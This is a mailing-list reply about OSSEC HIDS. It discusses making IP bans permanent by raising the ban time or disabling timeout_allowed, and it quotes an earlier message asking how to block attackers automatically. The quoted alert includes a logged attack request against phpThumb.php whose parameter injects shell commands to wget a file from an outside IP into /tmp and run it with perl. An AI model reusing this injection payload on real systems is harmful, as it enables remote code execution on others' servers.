Hello there, I was having similar problem. I wanted to find the way how to block an ip permanently. I ended up with increasing the "ban time" for not 600 but 6000000000 seconds and I think that is enough right?
I also think that if you changed this option <timeout_allowed>yes</timeout_allowed> to "no" then the ip address will be banned forever, but haven't tried this option yet. Peter On Tue, Dec 27, 2011 at 3:02 PM, jeff <[email protected]> wrote: > From time to time I get these bozo's trying to hack the site. > > If there any way to take any level 9's and level 10's offenders IP > addresses and add their IP addresses to a blocked list automatically. > > Thanks in advance. > > > OSSEC HIDS Notification. > > 2011 Dec 26 10:40:46 > > Received From: (mysite-on-12) > 65.36.247.12->/usr/local/apache1.3/logs/ > surveyreports_access_12262011.log > > Rule: 31153 fired (level 10) -> "Multiple common web attacks from same > souce > ip." > > Portion of the log(s): > > 94.23.24.185 - - [26/Dec/2011:12:09:27 -0500] "GET > /wp-content/themes/Comfy/scripts/phpThumb/phpThumb.php? > src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line > %20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f > %2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f; > %20&phpThumbDebug=9 > HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) > Gecko/20100101 Firefox/8.0" >
